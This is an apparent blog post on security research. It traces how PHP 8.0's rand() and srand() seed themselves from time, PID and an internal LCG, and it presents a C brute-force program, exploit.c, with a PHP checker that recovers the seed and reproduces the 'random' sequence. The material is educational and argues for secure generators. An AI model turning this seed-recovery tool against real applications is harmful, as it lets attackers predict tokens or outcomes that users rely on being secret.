Sitemap

Exploiting Weak Pseudo-Random Number Generation in PHP’s rand and srand Functions

12 min readOct 18, 2023

--

Abstract

This article offers an in-depth exploration of the rand() and srand() functions in PHP 8.0, particularly focusing on the nuances of their random number generation and potential vulnerabilities. Drawing inspiration from PHP’s underlying C code, we’ll reverse engineer its mechanics, leading to the development of an exploit. This analysis was sparked by observing a PHP plugin that used rand() insecurely. While the goal is to shed light on these potential vulnerabilities, it’s essential to emphasize that this knowledge should be applied ethically and responsibly. Always prioritize the betterment of the digital community, ensuring that vulnerabilities are disclosed appropriately and used for constructive purposes only. This article encapsulates my extensive research, brainstorming, and developmental efforts on this topic.
Code and scripts can be found here: https://github.com/moorejacob2017/exploiting_phps_rand_function

Basics of pseudo-random number generation

“How are random numbers generated?” It’s a simple question that can get complicated very quickly, but the basics are fairly straightforward. Random numbers are usually generated through algorithms that produce a sequence of numbers in a fashion that appears random, but are actually based on numbers produced earlier in the sequence. These algorithms are referred to as pseudo-random Number Generators, or PRNGs for short.

An example of a simple PRNG is the Linear Congruential Generator (LCG), which is defined as follows…

X_n+1 = (a * X_n + c) % m

Here a, c, and m are constants, X_n is the current number in the sequence, and X_n+1 is the next number in the sequence. Once we perform the operations to the right of the equal sign, the value we get is X_n+1, which then becomes the new X_n the next time we perform the operation, repeating the cycle to get the next number in the sequence.

However, the sequence has to start somewhere, right? So what number do we pick for X_0, the first number to be plugged into the algorithm? This first number is called the seed. Because most PRNGs are based on these styles of sequences, a given seed will always produce the exact same sequence of “random” numbers. This deterministic nature is why they are referred to as “pseudo-random” number generators. To avoid producing the same pattern of numbers every run, most seeds are generated using other unpredictable elements, like the current time or the movement of a user’s mouse.

For example, the following Python code uses the LCG method of random number generation to print three random numbers between 0 and 24 and will have the seed set to 10…

# Constants
a = 3
c = 7
m = 25

# The Seed
X_0 = 10

# Generating 3 Pseudo-Random Numbers using the LCG method
X_1 = (a * X_0 + c) % m
X_2 = (a * X_1 + c) % m
X_3 = (a * X_2 + c) % m

print(X_1, X_2, X_3)

This code will always produce the numbers 12, 18, and 11. But if we increase the seed X_0 from 10 to 11, we will instead get the output of 15, 2, and 13. To make it feel more random, we can set the seed to the current time. This will cause the script to produce a different set of numbers every time it is run.

# Import the time() function
from time import time

# Constants
a = 3
c = 7
m = 25

# Set the Seed to the current epoch time in whole seconds
X_0 = int(time())

# Generating 3 Pseudo-Random Numbers using the LCG method
X_1 = (a * X_0 + c) % m
X_2 = (a * X_1 + c) % m
X_3 = (a * X_2 + c) % m

print(X_1, X_2, X_3)
Generating random numbers with the current time as the seed

Exploits by deriving the seed

A typical attack scenario is as follows…

Alice hosts a lottery where a computer generates three random numbers. Anyone guessing all three numbers wins a prize. Upon being asked by Alice to guess, Bob, having knowledge that Alice utilized the LCG with a seed of 14 (and being aware of the LCG’s other parameters), can replicate the LCG using the same seed. This allows Bob to generate the identical sequence of numbers as Alice, thus providing the winning numbers and claiming the prize.

While this example may appear simplistic, its premise bears similarities to real-world lotteries, including the Powerball in the United States and the EuroMillions in Europe.

The potential vulnerability in using seeds with weak PRNGs lies in the assumption that seeds are secretive and not known to unauthorized parties. If an attacker can deduce or obtain the seed, they can predict the generated random sequence. In our exploit, we focus on deriving the seed utilized by rand() and srand() to generate a series of numbers.

The scenario

For this demonstration, I will utilize the rand() function to generate 10 random numbers. My objective is to identify and generate the seed necessary to reproduce the exact same sequence. Once achieved, a confirmation message will be printed to the screen. Here's the PHP code to generate the random numbers (note that additional lines will be added later)…

<?php
for ($i = 1; $i <= 10; $i++) {
echo "RAND$i:".rand().'|';
}
?>

The rand() function implicitly calls srand() in the background. As a result, the seed remains unknown unless I can generate it independently and reproduce the same random sequence. The validation code that compares my generated numbers with the target numbers is shown below…

<?php
$seed = <my_generated_seed>;
srand((int)$seed);

// The sequence of generated numbers to test against
$targetNums = [
104976659,
1739634291,
1500525663,
1256266489,
2105373119,
1483350734,
212261578,
523521068,
2050272690,
2119931952
];
$itr = 0;
foreach ($targetNums as $num) {
if (rand() !== $num) {
break; // Exit if any number doesnt match
}
$itr = $itr + 1;
}
if ($itr == 10) {
// If the list was exhausted then the seed was found
echo "\n----------------------------------\n";
echo "SUCCESS!\n";
echo "SEED: $seed\n";
echo "----------------------------------\n\n";
}
?>

To paraphrase Scotty from Star Trek (2009), the odds of blindly guessing the same random numbers needed to get the print-out would be, “…like trying to hit a bullet with a smaller bullet whilst wearing a blindfold, riding a horse.”

Tracing PHP’s underlying C code to find seed generation

Further analysis requires us to read the source code that PHP is built with, which is fortunately posted on github, specifically the 8.0 version or earlier (php-src). Starting with ext/standard/rand.c...

PHP 8.0’s ext/standard/rand.c

We can confirm on line 32 and 39 that the C functions php_rand() and php_srand() have been aliased to php_mt_rand() and php_mt_srand() and that the implementation of the PHP function rand() uses the mt variants of the C functions. In our scenario, rand() is being called without arguments, meaning ZEND_NUM_ARGS() will return 0 and we will end up stepping into the php_mt_rand() function on line 51. This function can be found in ext/standard/mt_rand.c on line 157.

PHP 8.0’s ext/standard/mt_rand.c

A quick glance and some interpretation shows that if the functions haven’t been seeded yet (line 164), then PHP will generate a seed of random bytes (line 167) and run php_mt_srand() with the bytes to set the seed (line 169). The important function here is GENERATE_SEED(), which will show us exactly how PHP picks a starting seed for its generators. This function is actually defined in the ext/standard/php_rand.h header file.

PHP 8.0’s ext/standard/php_rand.h

This is essentially an if/else to determine which operating system is being used. I’m on Linux, so the GENERATE_SEED() definition is on line 66. With this function we have the first piece to the puzzle. To generate a seed, PHP requires 3 specific values returned by 3 different functions; time(0), getpid(), and php_combined_lcg().

GENERATE_SEED() (((zend_long) (time(0) * getpid())) ^ ((zend_long) (1000000.0 * php_combined_lcg())))
// | | |
// | | |--- ???
// | |--- Returns the PID of the PHP interpreter running the script
// |--- Returns the current epoch time

Knowing from experience, time(0) will return the current epoch time of the system and getpid() returns the process id of the running process, but php_combined_lcg is a mystery. Luckily, the hint is in the name. lcg is short for "Linear Congruential Generator," which is another type of PRNG. That's right! PHP's PRNG uses another PRNG to initialize a seed! This implementation leads us to ext/standard/lcg.c. Here we find php_combined_lcg() on line 51.

PHP 8.0’s php_combined_lcg in ext/standard/lcg.c

Two things are important here. The least important one is the LCG() function, which is just used to dereference elements of a php_lcg_globals struct that manages the LCG's seeded state and two other values. The struct and function are defined in ext/standard/php_lcg.h.

PHP 8.0’s php_lcg_globals in ext/standard/php_lcg.h

The more important thing to note is that when the primary php_lcg_globals struct has not been seeded (line 56), the lcg_seed() function is called, which is defined on line 72.

PHP 8.0’s lcg_seed in ext/standard/php_lcg.h

This function will give us the final pieces that we need. Here’s the breakdown of how the LCG is seeded.

static void lcg_seed(void)
{
struct timeval tv;
// |
// |--- struct type returned by `gettimeofday()`.
// Has 2 elements: tv_sec is seconds (epoch time)
// tv_usec is microseconds
//
// |---------- Gets the current epoch time with microsecond
// | precision and stores it in the `timeval` struct
// | that was passed by refrence (aka tv)
// | Returns 0 on success and -1 on error
// |
if (gettimeofday(&tv, NULL) == 0) {
LCG(s1) = tv.tv_sec ^ (tv.tv_usec<<11);
// | |
// |--------------------------------------|
// |
// |--- Left shift the microseconds by 11 bits, XOR it with
// the current epoch time, then store it as `s1` in
// the primary `php_lcg_globals` struct


} else {
LCG(s1) = 1;//--- Only done on `gettimeofday` errors, not important
}
#ifdef ZTS
LCG(s2) = (zend_long) tsrm_thread_id();//--- Not important in our scenario
// Not executed
#else
LCG(s2) = (zend_long) getpid();
// |------------------------------|
// |
// |--- Get the PID of the PHP interpreter and store it as
// `s2` in the primary `php_lcg_globals` struct
#endif

// |--- Get a new time and store it in `tv`
// | Note that `tv.tv_sec` is not used here
// |
if (gettimeofday(&tv, NULL) == 0) {
LCG(s2) ^= (tv.tv_usec<<11);
// |---------------------------|
// |
// |--- Left shift the new microseconds by 11 bits, XOR it with
// the PID (aka `s2`) and store it as `s2` in the primary
// `php_lcg_globals` struct
}

LCG(seeded) = 1;//--- Mark that the generator has been seeded
}

The LCG requires 4 different values to generate a seed; the current epoch time, the process id, and 2 different microsecond times. However, the first microsecond time can be brute forced, while the second microsecond can be treated as an offset. On top of that, after testing, it was found that no matter what the microsecond offset is, there are only 1 million possible seeds for any PID/Epoch pair, and it will start to generate duplicate seeds. This leaves us with the ability to treat it as a cracking problem. We will go ahead and obtain the epoch time and pid at runtime, brute force the microseconds and offset, use that information to generate a list of potential seeds, and then see which seed generates the sequence of numbers we are looking for.

Planning and Exploit Development

To generate seeds for the Linear Congruential and Mersenne Twister generators, we will obtain/manipulate four pieces of information:

  1. Epoch Time — Obtained at runtime.
  2. PID — Obtained at runtime.
  3. Microseconds — Brute-forced.
  4. Microseconds + Offset — Brute-forced up to a predetermined amount.

We will then write an exploit, reusing parts of the PHP source code, ensuring our values are injected into six different positions. This will create a PHP seed generator.

//---------------------------------- Mersenne Twister Generator ----------------------------------------
//
// Epoch Time
// | PID
// | |
GENERATE_SEED() (((zend_long) (time(0) * getpid())) ^ ((zend_long) (1000000.0 * php_combined_lcg())))
// |
// |
// |--------------------------------------|
// |
// |
//--------------------------- Linear Congruential Generator (Stripped) ---------------------------------
//
static void lcg_seed(void)
{
// Epoch Time
// | Microseconds
// | |
LCG(s1) = tv.tv_sec ^ (tv.tv_usec<<11);

// PID
// |
LCG(s2) = (zend_long) getpid();

// Microseconds+Offset
// |
LCG(s2) ^= (tv.tv_usec<<11);


LCG(seeded) = 1;
}

This leaves us with the following exploit.c file.

#include <stdio.h>
#include <sys/time.h>
#include <unistd.h>
#include <stdint.h>
#include "zend_long.h"
//==============================================================================
typedef struct {
int32_t s1;
int32_t s2;
int seeded;
} php_lcg_globals;
//==============================================================================
#define MODMULT(a, b, c, m, s) q = s/a;s=b*(s-a*q)-c*q;if(s<0)s+=m
//==============================================================================
#define GENERATE_BAD_SEED(a, b, c, d, e) (((zend_long) (c * b)) ^ ((zend_long) (1000000.0 * bad_php_combined_lcg(a,b,c,d,e))))
//==============================================================================
static void bad_lcg_seed(php_lcg_globals* lcg, int pid, long epoch, long uepoch, int uepochOffset)
{
lcg->s1 = epoch ^ (uepoch<<11);
lcg->s2 = (zend_long) pid;
lcg->s2 ^= ((uepoch + uepochOffset)<<11);
lcg->seeded = 1;
}
//==============================================================================
double bad_php_combined_lcg(php_lcg_globals* lcg, int pid, long epoch, long uepoch, int uepochOffset)
{
int32_t q;
int32_t z;

if (!lcg->seeded) {
bad_lcg_seed(lcg, pid, epoch, uepoch, uepochOffset);
}

MODMULT(53668, 40014, 12211, 2147483563L, lcg->s1);
MODMULT(52774, 40692, 3791, 2147483399L, lcg->s2);

z = lcg->s1 - lcg->s2;
if (z < 1) {
z += 2147483562;
}

return z * 4.656613e-10;
}
//==============================================================================
int main(void){
php_lcg_globals test;

int pid = 343454;//--- PID
long epoch = 1680751918;//--- EPOCH TIME
long uepoch = 0;//--- MICROSECONDS
int uepochOffset = 0;//--- OFFSET
const int MAX_UEPOCH_OFFSET = 14;

test.s1 = 0;
test.s2 = 0;
test.seeded = 0;

for(uepoch = 1; uepoch < 1000000; uepoch++){
for(uepochOffset = 0; uepochOffset <= MAX_UEPOCH_OFFSET; uepochOffset++){
test.seeded = 0;
printf("%ld\n", GENERATE_BAD_SEED(&test, pid, epoch, uepoch, uepochOffset));
}
}
return 0;
}
//==============================================================================

Exploitation

From here, it’s easy (thanks to some templating and automation). Running the exploit script will do the following:

  1. Generate 10 random numbers using PHP and grab the PID and current epoch time
  2. Run setup_test.py, which will copy the PID and epoch time into our exploit.c file and copy the target numbers into our PHP testing file
  3. Compile our exploit file
  4. Run the exploit to generate a list of possible seeds
  5. Remove duplicate seeds from our list of possible seeds
  6. Generate sets of random numbers given our provided seeds until we generate the same sequence of random numbers as the target numbers

ET VOILA!

Running the exploitation script

We successfully took elements from our machine environment, regenerated an unknown seed for a pseudo-random number generator, and created the exact same sequence of “random” numbers two times in a row.

Conclusion and after-thoughts

While it is a neat trick and was fun to work on, this method of exploitation is heavily dependent on the context. The three major hindrances to exploitation in the wild are PHP’s use of PID, the microsecond offset, and local vs remote brute forcing. With the default size of an OS’s PID pool, coupled with the microsecond offset, there are too many potential values produced to efficiently execute over an internet connection. It is common to have a PID pool size of 2¹⁵ or 32,768 different ids. The offset microsecond offset means that for every PID/Epoch pair, there are 1 million different potential seeds. This means that, assuming no overlap, there are 32,768,000,000 different seeds. And that is assuming that the epoch time is correct on the victim machine and that you accurately clocked the time on your request. It is also possible for x64-bit machines to have PID pools set as large as 2²² or over 4 million different ids (eg. like my desktop, which is currently assigning PIDs in the 300,000s as the time of writing).

If somehow the PHP interpreter’s PID is being leaked, exposed, or other-wise known, then it has some potential to be used. But one has to keep in mind that a single pair generates 1 million seeds which are sent over 1 million requests. This is noisy and can take hours depending on the internet quality. I have some ideas as to how one might overcome some of these issues, but those would require more time and testing and are better saved for another time.

It may be a niche exploit that requires the right circumstances, but it does help bring attention as to why cryptographically secure pseudo-random number generators are important in security. This concept of exploiting seeds can also be extended to various other languages and implementations, making it a bit more than just a one-off party trick.

References

--

--

No responses yet